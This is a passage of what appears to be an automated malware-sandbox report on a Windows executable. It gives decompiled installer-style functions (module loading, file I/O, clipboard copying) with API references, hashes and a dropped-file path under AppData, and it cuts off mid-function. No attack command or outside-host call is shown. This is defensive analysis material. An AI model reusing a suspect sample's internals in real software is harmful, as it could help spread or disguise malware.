              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
              • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406931, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406931(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004068C1(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





              0x00406939
              0x0040693c
              0x00406943
              0x0040694b
              0x00406957
              0x00000000
              0x0040695e
              0x0040694e
              0x00406955
              0x00000000
              0x00406966
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
              • Opcode Fuzzy Hash: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406032, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E00406032(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





              0x00406036
              0x00406043
              0x00406058
              0x0040605e

              APIs
              • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00406036
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040600D, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040600D(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





              0x00406012
              0x00406018
              0x0040601d
              0x00406026
              0x00406026
              0x0040602f

              APIs
              • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406026
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405AF0, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405AF0(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




              0x00405af6
              0x00405afe
              0x00000000
              0x00405b04
              0x00000000

              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F11C75, Relevance: 1.7, APIs: 1, Instructions: 431COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cf3e08ff55b8ae7de8de1e7d63aac67220cabf838a571d0e20aa61da1f1d5e0
              • Instruction ID: f067571a1418877a6624ed7087d5e08dcb8413a77f4fbcf759377d687eca6414
              • Opcode Fuzzy Hash: 7cf3e08ff55b8ae7de8de1e7d63aac67220cabf838a571d0e20aa61da1f1d5e0
              • Instruction Fuzzy Hash: BCF11026E50398A9EB60CBE4EC55FFDB3B5AF48B50F105497EA0CEE190E7704A80DB15
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004060E4, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004060E4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x004060e8
              0x004060f8
              0x00406100
              0x00000000
              0x00406107
              0x00000000
              0x00406109

              APIs
              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FF7B,0040CEF0,00403511,0040CEF0,0040FF7B,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004060B5, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004060B5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x004060b9
              0x004060c9
              0x004060d1
              0x00000000
              0x004060d8
              0x00000000
              0x004060da

              APIs
              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403590, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403590(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




              0x0040359e
              0x004035a4

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F1126A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 0ed5d90a96634ea9f89f7d1cf6f0a10d53323473acfa44cc33b6114d1b48ce1d
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: FBD05EB1C5034CBFDB08EFE1CC8685DBF7DDB05341F50819AAD0067100DA759B109B94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 004056E3, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E004056E3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405677, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406579(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a30c == _t156) {
								E004055A4( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040446B(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040446B(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044F9(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004044C7(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a274;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004044C7( *0x429230);
				 *0x429234 = E00404E20(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404492(_a4);
				if(( *0x42a27c & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a27c & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044C7( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a27c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































              0x004056eb
              0x004056f1
              0x004056fb
              0x004056fe
              0x00405894
              0x004058b8
              0x004058b8
              0x004058cb
              0x004058e9
              0x004058eb
              0x004058f3
              0x00405949
              0x0040594d
              0x00000000
              0x00000000
              0x0040594f
              0x00405955
              0x00000000
              0x00000000
              0x0040595f
              0x00405967
              0x0040596a
              0x00405a6c
              0x00000000
              0x00405a6c
              0x00405979
              0x00405984
              0x0040598d
              0x00405998
              0x0040599b
              0x004059a4
              0x004059aa
              0x004059ad
              0x004059ad
              0x004059c5
              0x004059ce
              0x004059d1
              0x004059d8
              0x004059df
              0x004059e7
              0x004059e7
              0x004059fe
              0x004059fe
              0x00405a05
              0x00405a0b
              0x00405a17
              0x00405a1e
              0x00405a27
              0x00405a29
              0x00405a2c
              0x00405a3b
              0x00405a3e
              0x00405a44
              0x00405a45
              0x00405a4b
              0x00405a4c
              0x00405a4d
              0x00405a55
              0x00405a60
              0x00405a66
              0x00405a66
              0x00000000
              0x004059c5
              0x004058fb
              0x0040592b
              0x00405933
              0x0040593e
              0x0040593e
              0x00405944
              0x00000000
              0x00405944
              0x004058ff
              0x00405909
              0x00000000
              0x004058cd
              0x004058d3
              0x0040590e
              0x00000000
              0x00405917
              0x004058dc
              0x004058e1
              0x004058e4
              0x00000000
              0x004058e4
              0x004058cb
              0x00405704
              0x00405708
              0x00405710
              0x00405714
              0x00405717
              0x0040571a
              0x0040571d
              0x00405720
              0x00405721
              0x00405722
              0x0040573b
              0x0040573e
              0x00405748
              0x00405757
              0x0040575f
              0x00405767
              0x0040576c
              0x0040576f
              0x0040577b
              0x00405784
              0x0040578d
              0x004057af
              0x004057b5
              0x004057c6
              0x004057cb
              0x004057d9
              0x004057e7
              0x004057e7
              0x004057ec
              0x004057fa
              0x004057fa
              0x004057ff
              0x00405802
              0x00405807
              0x00405813
              0x0040581c
              0x00405829
              0x00405838
              0x0040582b
              0x00405830
              0x00405830
              0x00405844
              0x00405844
              0x00405858
              0x00405861
              0x0040586a
              0x0040587a
              0x00405886
              0x00405886
              0x00000000

              APIs
              • GetDlgItem.USER32 ref: 00405741
              • GetDlgItem.USER32 ref: 00405750
              • GetClientRect.USER32 ref: 0040578D
              • GetSystemMetrics.USER32 ref: 00405794
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
              • ShowWindow.USER32(?,00000008), ref: 00405830
              • GetDlgItem.USER32 ref: 00405851
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
              • GetDlgItem.USER32 ref: 0040575F
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • GetDlgItem.USER32 ref: 004058A3
              • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
              • CloseHandle.KERNEL32(00000000), ref: 004058B8
              • ShowWindow.USER32(00000000), ref: 004058DC
              • ShowWindow.USER32(?,00000008), ref: 004058E1
              • ShowWindow.USER32(00000008), ref: 0040592B
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
              • CreatePopupMenu.USER32 ref: 00405970
              • AppendMenuW.USER32 ref: 00405984
              • GetWindowRect.USER32 ref: 004059A4
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
              • OpenClipboard.USER32(00000000), ref: 00405A05
              • EmptyClipboard.USER32 ref: 00405A0B
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
              • GlobalLock.KERNEL32 ref: 00405A21
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
              • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
              • CloseClipboard.USER32 ref: 00405A66
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: H7B${
              • API String ID: 590372296-2256286769
              • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
              • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404EFF, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00404EFF(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				int _v32;
				void* _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t191;
				signed int _t203;
				void* _t206;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t249;
				signed int _t251;
				signed char _t252;
				signed char _t260;
				void* _t265;
				void* _t267;
				signed char* _t285;
				signed char _t286;
				long _t291;
				void* _t298;
